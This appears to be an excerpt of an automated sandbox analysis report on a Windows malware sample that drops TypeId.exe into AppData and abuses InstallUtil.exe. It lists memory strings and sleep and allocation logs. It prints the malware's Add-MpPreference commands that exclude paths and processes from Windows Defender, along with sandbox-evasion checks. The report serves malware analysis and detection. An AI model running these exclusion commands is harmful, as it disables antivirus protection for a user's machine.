C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1782217190.0000000006932000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE/COMMAND>
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_7764.TXTHXE
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG$
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRFQ
                    Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: D-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXES
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULTALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILESPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=%PROGRAMFILES(X86)%\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWS
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILE:///C:/USERS/user/APPDATA/LOCAL/REGISTEREDCHANNELS/HWRTALNMJ/TYPEID.EXEK
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEW
                    Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQKC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!6BA. OPERATION: MPPREFERENCE. TARGET: CONFIGLISTEXTENSION.
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!
                    Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PEID.EXE.CONFIG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ES\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEH
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;P^
                    Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEKB
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NPROCESS TYPEID.EXE;
                    Source: file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXED
                    Source: TypeId.exe, 00000003.00000002.1948488274.000000000695E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NNELS\HWRTALNMJ\TYPEID.EXE
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE@
                    Source: powershell.exe, 00000006.00000002.2358271034.000002112F437000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXERYOUTPUT DEVICE ERRORPERFORMANCE DEGRADEDPOWER PROBLEMPRESSURE UNACCEPTABLEPROCESSOR PROBLEM (INTERNAL MACHINE ERROR)PUMP FAILUREQUEUE SIZE EXCEEDEDRECEIVE FAILURERECEIVER FAILUREREMOTE NODE TRANSMISSION ERRORRESOURCE AT OR NEARING CAPACITYRESPONSE TIME EXCESSIVERETRANSMISSION RATE EXCESSIVESOFTWARE ERRORSOFTWARE PROGRAM ABNORMALLY TERMINATEDSOFTWARE PROGRAM ERROR (INCORRECT RESULTS)STORAGE CAPACITY PROBLEMTEMPERATURE UNACCEPTABLETHRESHOLD CROSSEDTIMING PROBLEMTOXIC LEAK DETECTEDTRANSMIT FAILURETRANSMITTER FAILUREUNDERLYING RESOURCE UNAVAILABLEVERSION MISMATCHPREVIOUS ALERT CLEAREDLOGIN ATTEMPTS FAILEDSOFTWARE VIRUS DETECTEDHARDWARE SECURITY BREACHEDDENIAL OF SERVICE DETECTEDSECURITY CREDENTIAL MISMATCHUNAUTHORIZED ACCESSALARM RECEIVEDLOSS OF POINTERPAYLOAD MISMATCHTRANSMISSION ERROREXCESSIVE ERROR RATETRACE PROBLEMELEMENT UNAVAILABLEELEMENT MISSINGLOSS OF MULTI FRAMEBROADCAST CHANNEL FAILUREINVALID MESSAGE RECEIVEDROUTING FAILUREBACKPLANE FAILUREIDENTIFIER DU
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_7764.TXT
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXECOMMONPROGRAMFILP
                    Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: .ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TYPEID.EXEIN<
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE0
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: file.exe, 00000000.00000002.1789340533.0000000007658000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1761959990.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1788582879.000000000726F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787378066.000000000703C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE</COMMAND>
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1002\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2289203789.00000182C74F1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2030654642.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2022257156.00000000085C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE
                    Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TYPEID.EXE[T
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X\MICROSOFT\WINDOWS\REGISTEREDCHANNELS\TYPEIDLS\HWRTALNMJ\TYPEID.EXE
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K+ ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEYQ4
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_7764.TXT
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 3370000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 6B60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 7B60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 7CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 8CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Memory allocated: 9EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 1620000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 3120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 5120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 6D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Memory allocated: 7D50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 15C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 3050000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 5050000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 6A90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 7A90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 8B50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 9B50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 2850000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 2790000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 63C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Memory allocated: 73C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 3351
                    Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 910
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5856
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3886
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Window / User API: threadDelayed 1719
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Window / User API: threadDelayed 2069
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4960
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4684
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8118
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1388
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Window / User API: threadDelayed 3588
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Window / User API: threadDelayed 601
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7660 Thread sleep count: 3351 > 30
                    Source: C:\Users\user\Desktop\file.exe TID: 7660 Thread sleep count: 910 > 30
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99546s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99219s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99108s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98877s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98750s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98640s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98526s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98234s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98125s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -98015s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632 Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7620 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916 Thread sleep count: 5856 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep count: 3886 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864 Thread sleep count: 1719 > 30
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864 Thread sleep count: 2069 > 30
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832 Thread sleep time: -99546s >= -30000s
